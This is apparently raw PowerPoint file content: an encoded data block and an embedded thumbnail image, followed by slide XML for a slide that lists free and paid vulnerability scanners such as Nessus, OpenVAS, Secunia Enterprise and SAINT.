SYjHS1I5kpYHC7muG3I7+q3mTceBSwU8EbI6VkkEra6PGmtrZHtcGnnXawuJyl28237zuO1n37jwKJLI3o4BM8EsLejgEzwVdI4tGzqvL7uHzYnUmKCSVoBMcT3gHcS1pcL+TYtE0B01r66L5bWwUsVEYZHiRjy12dhsQ4Pecrdjtp8S3XHu9Z+ry/A5cY1MxYbJBJBle6smo52VbXZ+SdT5r2G3LuybvKrJi2z49rVM2GRV+HHky+ujpntkEb3taSb3aHENva48i3HSHSIw0lTNSOgllpgRkdMxjGy3AyyuzANO2+UkE7tl7rhlNh7BoxA9rQHT4qwSkEhz8pe1vT0A22L7K2gZTx6SwQtDY4zTNY0EnKOV8pv0lB3KkxpvyeGaofFE6dkezlWFhleAcjH3s/adlt69KrHIInFstRCwtYJHB8jGERk2DyHH7N7C+5cWxqGMVGDSYjDJNQHC4omtY10rflZadmRm0uN49g32G+xWI0+hiZV4y2shkdUP5CTDn5XOayDMA52YbGty5W3Oy4tvQdZx3SyWPFsMpYXsMFc2Z0tg1+drW5mFr/Fu3Ldlx7/AHjo11F/YBdhCD5sVqjDBLK0AmOJ8jQdxLWlwv5Ni53JrOqBg1JiXIxcpVVTYJG2kyNaXvbdvOvezRvJ3rfdIe9Kjq8vwOS8DQ+mjwWhxJrXComrWRyOzktLeUeNjN25rUDFVWLxQuyyzRMOVz7Pkaw8m37TrOI5o6TuCiTGoWxtmdPEI5CBHIZGNY8ncGvJs6/kK4ZrGgjbieKfLoZZJJaNjsMcGvc1ga1ud1wbBrdtzu2OvvVq2KMQYBJXwyS0IpnRytYHPby7r5AWt2knm2A2mxsg6NQaYSnHK2jllYKWlo452khrMhc2Iuc6Q9HPdv8AGtr/AE3ByTZ/lEXJPdlbJyjMjnE2Aa++Um+ywK4JrAw98mJYl8nuI4aGjlnitkdJSsEBczxty81x8w+JfXp/JDNJQVDSWYY7D+TpbQGsjiqAXAxckHttJbI25dvb5Cg7nUYpFG9kb5Y2vlvybXPa10gG05Wk3dYeIL6IZQ9oexwc1wDmuBDg5p2ggjYQR0rhtZgIfPo9R1XKPY6Koa9srTBIYjZzWPY17svNsLZt2w+JdwpKZsUbYo2hrI2BjGjc1rRYAeoIPZCEIIUOCshBQNRlV0IKWUZV6IQeeVTZXQgplUPGw8FdUl3KAsrOjgEzjVx1up+q/bU+wfrSfkXYmrilO31dHl5QamoZ6XmvT6eu9r3+/wB2SVWyspXcyymVRZeiEFLIyq6EFLKwUoQQVUhWUFBW3+rqcqsFKCmX/W9FldCDzylXClCAQhCD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9" descr="data:image/jpeg;base64,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Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476342" y="1905000"/>
            <a:ext cx="4831930" cy="4876800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" tIns="0" rIns="45720" bIns="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr kumimoji="0"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2"/>
              <a:buNone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Arial"/>
              <a:buNone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1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings 2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1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial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/>
              <a:buNone/>
              <a:defRPr kumimoji="0"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ct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone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None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None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General Scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		MSBA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Paid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Nessus Pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Secunia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Enterprise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		SAINT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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334011" y="304800"/>
